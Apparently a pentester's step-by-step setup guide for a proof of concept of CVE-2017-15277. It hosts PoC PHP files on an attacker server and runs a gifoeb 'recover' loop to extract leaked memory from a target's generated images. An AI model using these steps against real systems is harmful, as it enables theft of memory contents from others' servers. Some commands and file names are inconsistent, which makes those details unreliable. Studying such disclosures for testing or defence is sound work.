***Server Set-up***
1. Spin up a server on the internet, I used AWS for this. (I used AWS Kali Linux instance)
2. Download and start the Nginx service. 
    `$ sudo apt-get install nginx && service start nginx`
3. Download PHP library and set-up LEMP stack for PHP processing, follow guides:
On Kali : https://medium.com/@jangid.hitesh2112/how-to-install-lamp-stack-on-kali-linux-183fa4f48d16
On Ubuntu:
    1. https://thishosting.rocks/install-php-on-ubuntu/
    2. https://www.digitalocean.com/community/tutorials/how-to-install-linux-nginx-mysql-php-lemp-stack-in-ubuntu-16-04#step-3-install-php-for-processing

***Host PoC Files on the Internet***
1. SCP the PoC files “red.php, ex.php” to the server. 
    1. On Mac example, $ scp red.php root@ServerIP:~/
2. Edit the files, red.php and ex.php to point URL to the address of our server on the Internet
    1. Something like, “http://AttackerServerDNSName/red.php”
3. Move the edited red.php and ex.php files into /var/www/html. 
4. Git clone the neex/gifoeb repository and move the sample.gif file from the ‘gifoeb’ exploit repository into /var/www/html.

***Attacker Set-Up***
1. Change directory into gifoeb, and create ‘previews’ directory (mkdir previews). Move the PoC_magic.sh file into previews. 
2. Edit the PoC.sh file to point the payload URL to our Internet server hosting the PoC files.
3. Make the poc_magic.sh script executable, I used chmod 777 poc.sh
4. PoC should generate jpg files into previews folder. If colorful pixels are present, target is vulnerable to CVE-2017-15277.
5. Run `for p in ./*; do ../gifoeb recover $p | strings >> result.txt ; done; cat result.txt` in previews folder with the generated jpg’s by the poc file. 
Examine result.txt for memory leakage.